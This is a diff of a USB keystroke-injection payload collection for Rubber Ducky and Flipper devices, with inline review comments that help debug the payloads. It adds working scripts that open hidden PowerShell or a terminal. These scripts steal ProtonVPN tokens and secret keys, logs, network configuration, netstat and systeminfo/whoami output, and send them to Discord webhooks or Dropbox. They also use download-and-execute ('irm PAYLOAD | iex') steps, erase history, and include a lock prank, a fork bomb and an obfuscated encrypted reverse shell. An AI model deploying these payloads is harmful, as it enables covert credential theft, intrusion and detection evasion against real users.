[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take linux logs.
Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Executing program
* Plug in your device
### Settings
* Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation


@ -0,0 +1,80 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRING USER_NAME=$(whoami)
ENTER
REM Create random num
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
REM Zip path
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
REM Default log path
DELAY 500
STRING LOG_PATH="/var/log/"
ENTER
DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
REM Send to Dropbox function
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_LINK
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM Send timing - it depends
DELAY 5000
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER


@ -0,0 +1,27 @@
# Exfiltrate Network Configuration - Linux ✅
A script used to exfiltrate the network configuration on a Linux machine.
**Category**: Exfiltrate, Execution
## Description
A script used to exfiltrate the network configuration on a Linux machine.
Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token


@ -0,0 +1,96 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM DELAY 500
REM STRING USER_NAME=$(whoami)
REM ENTER
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
DELAY 500
STRING ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
ENTER
REM Folder path
DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
ENTER
DELAY 500
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
ENTER
DELAY 1000
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
ENTER
DELAY 1000
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
ENTER
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
ENTER
STRING DROPBOX_FOLDER_NAME
ENTER
STRING "
ENTER
DELAY 500
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
DELAY 2000
STRING history -c
ENTER
DELAY 500
STRING rm -rf "$TMP_FOLDER_PATH"
ENTER
DELAY 500
STRING rm -rf "$ZIP_PATH"
ENTER
DELAY 500
STRING exit
ENTER


@ -0,0 +1,37 @@
$Path = "$Env:USERPROFILE\AppData\Local\ProtonVPN\ProtonVPN*\*\user.config"
$Content = Get-Content -Path $Path
$text = $Path + $Content
# Discord Connection
$hookurl = "$discord"
# Loop for Discord
$ConstantLimitForRestMethod = 1999
$TMP_Body = @{
'username' = $env:username
'content' = ""
}
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
try {
$TMP_Body = @{
'username' = $env:username
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
}
} catch [ArgumentOutOfRangeException] {
if($text.Length-$i -gt 0){
$TMP_Body = @{
'username' = $env:username
'content' = $text.Substring($i, $text.Length-$i)
}
} else {
break
}
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($TMP_Body | ConvertTo-Json)
}
# Clear the PowerShell command history
Clear-History


@ -0,0 +1,37 @@
# ProtonVPN config file ✅
A script used to stole target ProtonVPN config file.
**Category**: Credentials, Exfiltration
## Description
This script will stole target ProtonVPN config file.
Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
In the config file you can find a lot information about the user like:
- UserUid
- UserAccessToken
- UserRefreshToken
- UserAuthenticationPublicKey
- UserAuthenticationSecretKey
- UserAuthenticationCertificatePem
- UserCertificationServerPublicKey
- and so on...
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* ProtonVPN user logged at least one time
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke Get-Content for get in plaintext the ProtonVPN .config content
* Invoke-WebRequest will be entered in the Run Box to send the content


@ -0,0 +1,43 @@
REM ###################################################################
REM # |
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM Title: ProtonVPN-config-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM In the config file you can find a lot information about the user like:
REM - UserUid
REM - UserAccessToken
REM - UserRefreshToken
REM - UserAuthenticationPublicKey
REM - UserAuthenticationSecretKey
REM - UserAuthenticationCertificatePem
REM - UserCertificationServerPublicKey
REM - and so on...
REM Then it cleans up traces of what you have done after.
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
REM Version: 1.0
REM Category: Credentials, Exfiltration
REM Requirements: ProtonVPN user logged at least one time and internet connection
REM
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE WEBHOOK example.com
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
DEFINE PAYLOAD example.com
STRING ';irm PAYLOAD | iex
ENTER


@ -6,7 +6,7 @@
## Description ## Description
This payload exfiltrates Windows system information and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.* This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
## Usage ## Usage
@ -34,9 +34,9 @@ This payload exfiltrates Windows system information and installed programs from
- **Prepare your payload** - **Prepare your payload**
- Download the Powershell script ".ps1". - Download the Powershell script "script.ps1".
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application. - Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
- Upload your modified ".ps1" file to Dropbox and copy the upload link. - Upload your modified "script.ps1" file to Dropbox and copy the upload link.
- Replace the end of the link from "?dl=0" to "?dl=1" - Replace the end of the link from "?dl=0" to "?dl=1"
*This is your "<DOWNLOAD_LINK>".* *This is your "<DOWNLOAD_LINK>".*
- Download the "payload.txt" file. - Download the "payload.txt" file.
@ -44,9 +44,13 @@ This payload exfiltrates Windows system information and installed programs from
### Analysis ### Analysis
Once you have your report file, you can easily extract the information from the system and scan it for vulnerabilities. You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to check for missing patches that may result in a vulnerability that you could use to elevate your privileges on the target system. Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system.
The software installed on the target system may also present various opportunities for elevation of privileges. That's why the report also contains the name and version of each software installed on the target computer, allowing you to search for existing exploits on each installed software, through sites like [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com). You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system.
You can check if the user has dangerous permissions that can be exploited.
The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
--- ---


@ -12,6 +12,6 @@ GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
STRING DOWNLOAD_LINK STRING DOWNLOAD_LINK
STRING ; invoke-expression $pl STRING ; iex $pl
DELAY 500 DELAY 500
ENTER ENTER


@ -3,4 +3,4 @@
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app. #Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null


@ -36,7 +36,11 @@ $headers = @{
#Define the report for the file upload #Define the report for the file upload
$body = "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" $body = "# System Information #`n $(SYSTEMINFO | Out-String)"
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
#Upload the report to Dropbox using the headers and body defined above #Upload the report to Dropbox using the headers and body defined above


@ -16,10 +16,10 @@ This payload exfiltrate the target's Windows product key to a remote server. *On
``` ```
python -m http.server 80 python -m http.server 80
``` ```
- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server. - Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address: - Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
``` ```
http://<REMOTE_IP_ADDRESS>/.ps1 http://<REMOTE_IP_ADDRESS>/script.ps1
``` ```
### Analysis ### Analysis


@ -12,6 +12,6 @@ GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http:// STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
STRING REMOTE_IP_ADDRESS STRING REMOTE_IP_ADDRESS
STRING /.ps1; invoke-expression $pl STRING /.ps1; iex $pl
DELAY 500 DELAY 500
ENTER ENTER


@ -0,0 +1,41 @@
# Windows netstat ✅
A script used to stole target netstat status.
**Category**: Net, Exfiltration
## Description
This script will stole target netstat status.
Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
Then it cleans up traces of what you have done after.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
* Invoke the indicated commands
* Invoke-WebRequest will be entered in the Run Box to send the content
### Settings
Put 1 on the function that you want to active, else 0.
Functions available:
- default (*or simple 'netstat' command*)
- routing_table **$r**
- listening_canonical **$lc**
- listening_numerical **$ln**
- all_canonical **$ac**
- all_numerical **$an**
- offload **ot**
- proto **$p "\<protocol>"**
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*


@ -0,0 +1,79 @@
# Discord send function
function exfiltration () {
param(
[Parameter (Mandatory = $true, Position=0)] [String]$command,
[Parameter (Mandatory = $true, Position=1)] [String]$text
)
# Loop for Discord
$ConstantLimitForRestMethod = 1999
$TMP_Body = @{
'username' = $command
'content' = ""
}
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
try {
$TMP_Body = @{
'username' = $command
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
}
} catch [ArgumentOutOfRangeException] {
if($text.Length-$i -gt 0){
$TMP_Body = @{
'username' = $command
'content' = $text.Substring($i, $text.Length-$i)
}
} else {
break
}
}
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
}
}
# send command format
function send_command(){
param(
[Parameter (Mandatory = $true, Position=0)] [String]$cmd
)
$out = Invoke-Expression $cmd
(exfiltration $cmd [string]$out)
}
# Settings
if ( $d -eq "1") {
$cmd = "netstat"
(send_command $cmd)
}
if ( $r -eq "1") {
$cmd = "netstat -r"
(send_command $cmd)
}
if ( $lc -eq "1") {
$cmd = "netstat -af"
(send_command $cmd)
}
if ( $ln -eq "1") {
$cmd = "netstat -an"
(send_command $cmd)
}
if ( $ac -eq "1") {
$cmd = "netstat -qf"
(send_command $cmd)
}
if ( $an -eq "1") {
$cmd = "netstat -qn"
(send_command $cmd)
}
if ( $o -eq "1") {
$cmd = "netstat -t"
(send_command $cmd)
}
if ( $p -ne "" ) {
# format $proto="TCP"
$cmd = "netstat -ps " + $p
(send_command $cmd)
}
# Clear the PowerShell command history
Clear-History
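Review bot: On line 1723 `exfiltration $cmd [string]$out` passes the cast as text, because in PowerShell argument mode a bare `[string]` is not a type literal but the start of an expandable string, so `$text` begins with the literal characters `[string]` and the array `$out` is joined with `$OFS` (a single space) rather than line by line; the expression has to be parenthesised, `exfiltration $cmd ([string]$out)`. The `$p -ne ""` test on line 1754 is also true when `$p` was never set (`$null -ne ""`), so `netstat -ps ` would run with an empty protocol; `if ($p)` covers both the empty and the unset case. The `else { break }` branch on lines 1710-1712 is unreachable because the loop condition already guarantees `$text.Length - $i -gt 0`, and the initial `$TMP_Body` on lines 1694-1697 is overwritten before it is read. `$discord` on line 1714 is never defined in this file; a header comment stating that it and the switches `$d`, `$r`, `$lc`, `$ln`, `$ac`, `$an`, `$o`, `$p` must be set by the caller before the script runs would make the contract explicit.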

@ -0,0 +1,45 @@
REM ###################################################################
REM # |
REM # Title : Windows-netstat-to-Discord-Exfiltration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Net, Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################################
REM Title: Windows-netstat-to-Discord-Exfiltration
REM Author: Aleff
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
REM Put 1 on the function that you want to active, else 0. Functions available:
REM - default (simple 'netstat' command)
REM - routing_table $r
REM - listening_canonical $lc
REM - listening_numerical $ln
REM - all_canonical $ac
REM - all_numerical $an
REM - offload ot
REM - proto $p "<protocol>"
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
REM Target: Windows 10-11 (PowerShell)
REM Version: 1.0
REM Category: Net, Exfiltration
REM Requirements: Internet connection
REM
REM REQUIRED - Provide your Discord WEBHOOK
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass $discord='
STRING WEBHOOK
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
DEFINE PAYLOAD example.com
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
ENTER
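Review bot: The settings list in the header on line 1784, `REM - offload ot`, omits the `$` that every other entry carries, while line 1802 sets `$o='1'` and the companion script tests `$o`; it should read `REM - offload $o`. The README added in this commit repeats the same slip (`- offload **ot**` on line 1679). Line 1800 says `Reply example.com with YOUR LINK`; `REM REQUIRED - Replace example.com with the URL that serves Windows-netstat.ps1` reads more clearly.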

@ -0,0 +1,61 @@
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
REM # TITLE: Whatsapp Message Sender
REM #
REM # AUTHOR: Gopalsamy Rajendran LinkedIn: @gopalsamyrajendran Version:1.0
REM #
REM # Disclaimer: This script is only for Educational purpose. Please don't misuse it.
REM #
REM # Tested OS: Android version 12
REM #
REM # Note: Script won't work on locked devices
REM #
REM # Date: 08/03/2023
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
DEFINE PHONENUMBER +91XXXXXXXXXX
DEFINE MESSAGE Hi this is Gopalsamy Rajendran
REM #-------------------------------------------------
REM # Below lines will open search engine and type https://
DELAY 1000
GUI r
DELAY 100
STRING h
DELAY 100
STRING t
DELAY 100
STRING t
DELAY 100
STRING p
DELAY 100
STRING s
DELAY 500
DELAY 100
STRING :
DELAY 100
STRING /
DELAY 100
STRING /
DELAY 100
REM #-------------------------------------------------
REM #-------------------------------------------------
REM # Below lines will enter wa.me after https://
REM # Replace the mobile number with your's
STRING wa.me/
STRING PHONENUMBER
ENTER
DELAY 5000
REM #-------------------------------------------------
REM #-------------------------------------------------
REM # Below message will be sent to the target number confiugured above
REM # Replace the message with your own message
STRING MESSAGE
TAB
TAB
ENTER
DELAY 1000
REM #-------------------------------------------------
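Review bot: Lines 1837-1838 issue `DELAY 500` immediately followed by `DELAY 100`, which looks like a leftover from editing the per-character delays; collapsing them into a single `DELAY 600` (or dropping the stray one) keeps the timing intent readable. The comments on lines 1848 and 1855 have typos: `REM # Replace the mobile number with yours` and `REM # Below message will be sent to the target number configured above`. Line 1824 says the keystrokes "open search engine", which presumably refers to the Android search/URL field that `GUI r` is expected to raise; naming that explicitly would tie the comment to the `Tested OS: Android version 12` header.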

@ -0,0 +1,54 @@
REM EternalLock
REM Version 1.0
REM OS: Windows / Unix
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)
ATTACKMODE HID STORAGE
REM Extension DETECT_READY by Korben for best and fastest deployment
EXTENSION DETECT_READY
REM VERSION 1.0
REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay
REM TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
CAPSLOCK
DELAY RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Delay until the machine gets locked
DEFINE #TRIPWIRETIME 3000
REM Time between forced machine locks
DEFINE #LOCKTIME 100
WAIT_FOR_STORAGE_ACTIVITY
DELAY #TRIPWIRETIME
BUTTON_DEF
WHILE TRUE
ATTACKMODE STORAGE
END_WHILE
END_BUTTON
REM Lock machine until Button is pressed
WHILE TRUE
GUI l
DELAY #LOCKTIME
END_WHILE
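Review bot: The header on line 1869 states `OS: Windows / Unix`, but the lock loop on line 1908 sends `GUI l`, which is the Windows lock-screen shortcut (it also happens to be bound on some Linux desktops); macOS uses a different chord, so the `Unix` claim should be qualified or narrowed to what was tested. Line 1872 has typos: `REM ... until the button is pressed (or the ducky is pulled out)`. The DETECT_READY block's `ITERATION_LIMIT 120` times `RESPONSE_DELAY 25` gives the 3000 ms ceiling stated on line 1883, which is worth noting in a comment so the two stay in sync if either constant changes.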

@ -0,0 +1,14 @@
REM HTML Fork Bomb by Jonny Banana
REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
DELAY 2000
CONTROL ESCAPE
DELAY 200
STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
DELAY 200
ENTER
REM set a long delay to give time to this disgusting browser
DELAY 1000
REM it's time to enable Pop-Up
TAB
DELAY 200
ENTER
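Review bot: The newly added file on line 1920 still launches `C:\Program Files\Internet Explorer\iexplore.exe`, while the sibling hunk at line 1936 moves the existing copy of the same payload to `msedge.exe`; if both files are meant to stay, a `REM` line explaining why this one keeps the Internet Explorer path would help, otherwise it looks like a stale duplicate. The comment on line 1923 calls `DELAY 1000` a long delay while the sibling raises its value to 2000; the comment should say what the delay waits for (the browser window to become ready) rather than characterise its length.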

@ -3,11 +3,11 @@ REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
DELAY 2000 DELAY 2000
CONTROL ESCAPE CONTROL ESCAPE
DELAY 200 DELAY 200
STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/ STRING C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
DELAY 200 DELAY 200
ENTER ENTER
REM set a long delay to give time to this disgusting browser REM set a long delay to give time to this disgusting browser
DELAY 1000 DELAY 2000
REM it's time to enable Pop-Up REM it's time to enable Pop-Up
TAB TAB
DELAY 200 DELAY 200

@ -0,0 +1,56 @@
# Title: ReverseDuckyUltimate
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
**What is ReverseDuckyUlitmate?**
#
*ReverseDuckyUltimate (RDU) takes the best of every ReverseDucky payload. Customization, encryption, indentifiers, multi-layer polymorphism and automatic setup!*
*RDU is the ulitmate experience when it comes to remote access via your Rubber Ducky and it's so easy to use!*
#
## Instruction
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
- First: Create key.pem & cert.pem like so: <br>
```
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```
It will ask for information about the certificate - Insert whatever you want.<br>
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
- Second: Start a listener on your attacking machine which supports certificates.
Examples:
```
openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]
ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
```
- Third: Define the IP-Address and Port of your listening machine within the payload. Additionally add an unique identifier to give your Duck a name.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
## Instruction - Automatic Setup
- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
#
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
Credit for DS 3.0 implentation and ideas:
- Daniel Bohannon
- Grzegorz Tworek
- Korben
- Nikhil Mittal

@ -0,0 +1,357 @@
REM ReverseDuckyUltimate
REM Version 1.1
REM OS: Windows / Unix
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Extension Rolling_Powershell_Execution by 0iphor13 to obfuscate the start of Powershell
EXTENSION Rolling_Powershell_Execution
REM VERSION 1.0
REM Author: 0iphor13
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
REM Requirements: PayloadStudio v.1.3 minimum
REM Starts Powershell in uncommon ways to avoid basic detection
REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
REM CONFIGURATION:
REM Add ExecutionPolicy bypass
DEFINE #EXECUTIONPOLICY FALSE
DEFINE #DELAY 200
$_RANDOM_MIN = 1
$_RANDOM_MAX = 16
VAR $RANDOM_PS = $_RANDOM_INT
FUNCTION Rolling_Powershell_Execution()
IF ($RANDOM_PS == 1) THEN
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
ELSE IF ($RANDOM_PS == 2) THEN
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 3) THEN
